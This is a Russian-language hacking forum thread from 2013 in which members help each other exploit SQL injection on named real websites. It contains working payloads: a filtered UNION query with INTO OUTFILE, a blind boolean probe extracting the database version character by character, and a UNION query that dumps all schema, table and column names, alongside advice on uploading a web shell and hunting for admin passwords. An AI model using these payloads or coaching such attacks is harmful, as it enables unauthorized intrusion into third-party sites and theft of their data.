 |
|
28.07.2013, 18:11
|
|
Познающий
Регистрация: 20.08.2012
Сообщений: 49
Провел на форуме:
18470
Репутация:
0
|
|
Сообщение от Shelling
подключится к бд можно тем же шеллом всо залитым на любой хост там есть клиент
пассы на вход в админку могут быть где угодно в базе или в файле и от ос(линукс,вин)тут вообще не зависит
Хорошо,а если вход в пхпмайадмин по этой ссылке site.com/PMA/ то что в host писать ( site.com/PMA/ или site.com/ ?
Сообщение от Shelling
пассы на вход в админку могут быть где угодно в базе или в файле и от ос(линукс,вин)тут вообще не зависит
А где в Линуксе они хроняться?
|
|
|
28.07.2013, 20:24
|
|
Новичок
Регистрация: 15.03.2013
Сообщений: 0
Провел на форуме:
0
Репутация:
-5
|
|
в хост писать имя сайта но не всегда мускул находиться на том же сервере на пример на мастрехосте это другой сервер по этому лучше прочитайте конфиг какойнибудь если найдёте
|
|
|
|
29.07.2013, 03:13
|
|
Новичок
Регистрация: 23.02.2013
Сообщений: 14
Провел на форуме:
3581
Репутация:
0
|
|
привет всем
есть SQL Inject, помогите раскрутить.
Код:
GET /junior/88/matches/stage/SQLInject/ HTTP/1.1
Referer: http://allhockey.ru:80/
На сайте фильтруются пробелы,все что пока получилось
Код:
/junior/88/matches/stage/'-1'UNION(SELECT(null),'test',3,4,(INTO(OUTFILE)'test.html))/
Подправьте, что не так или посоветуйте другие варианты |
|
|
|
29.07.2013, 19:55
|
|
Новичок
Регистрация: 28.07.2013
Сообщений: 20
Провел на форуме:
4326
Репутация:
5
|
|
Каким образом можно создать площадку для проведения атаки на буфер обмена?
Нужна именно страница с таким кодом (на PHP), чтобы при запросе с определённым значением происходило переполнение буфера, вследствии чего появлялась ошибка (403, 228 etc.).
Проверка входящего запроса на наличие значение не пойдёт.
|
|
|
|
29.07.2013, 21:50
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
Провел на форуме:
94006
Репутация:
24
|
|
сайт.com/index.php?hl=ru&idd=cat&cat= '
Добавив в конце кавычку выдало следующую ошибку:
Код:
Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT * FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id='' ORDER BY mbmproduct.name ASC LIMIT 0,9
Или всё-таки должно выдать You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' |
|
|
|
29.07.2013, 21:57
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от Unknowhacker
сайт.com/index.php?hl=ru&idd=cat&cat=
'
Добавив в конце кавычку выдало следующую ошибку:
Код:
Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT COUNT(*) as count FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id=''Error in SELECT * FROM mbmproduct WHERE mbmproduct.cat_id IN (') AND mbmproduct.article != '' AND mbmproduct.cat_id != '' AND mbmproduct.group_id='' ORDER BY mbmproduct.name ASC LIMIT 0,9
Или всё-таки должно выдать
You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1''Вывод ошибок зависит от реализации выборки данных с бд, или конфигурации php.
1,2) or 1=1 order by 10000 -- w - что выдаст ?
|
|
|
|
29.07.2013, 23:25
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
Провел на форуме:
94006
Репутация:
24
|
|
Сообщение от Inoms
Вывод ошибок зависит от реализации выборки данных с бд, или конфигурации php.
1,2) or 1=1 order by 10000 -- w - что выдаст ?
Ничего. Фильтрует
Код:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13957%27
|
|
|
|
30.07.2013, 00:49
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от Unknowhacker
Ничего. Фильтрует
Код:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13957%27
Это слепая sql.
Её бессмысленно крутить, только по-символьно вытаскивать данные -
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=1%29%20or%201=1%20and% 20substring%28%28version%28%29%29,1,1%29=5%20%23w
Если что-то равно чему-то, в данном случае, первый символ версии субд=5 - выведет каталог), если нет - пустоту.
Или при лучших обстоятельствах сделать вывод мини-шелла в диру с сайтом при соответствующих привилегиях и правах.
|
|
|
|
30.07.2013, 00:55
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от Unknowhacker
Ничего. Фильтрует
Код:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13957%27
Так еще можно сделать
http://www.nova-plosha.com/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1 ,2,3,(select(@x)from(select(@x:=0x00),(select(null )from(information_schema.columns)where(table_schem a!=0x696e666f726d6174696f6e5f736368656d61)and(0x00 )in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name))))x),5,6,7,8,9,10,11,12, 13,14,15,16+--+
|
|
|
|
30.07.2013, 01:49
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
Провел на форуме:
94006
Репутация:
24
|
|
Сообщение от er9j6@
Так еще можно сделать
http://www.nova-plosha.com/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1 ,2,3,(select(@x)from(select(@x:=0x00),(select(null )from(information_schema.columns)where(table_schem a!=0x696e666f726d6174696f6e5f736368656d61)and(0x00 )in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name))))x),5,6,7,8,9,10,11,12, 13,14,15,16+--+
Та я сморю бессмысленно это URL-запрос в код "отражает" и всё..
P.S Но чувствую что там есть "дырочка", квалификации знаний не хватает
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
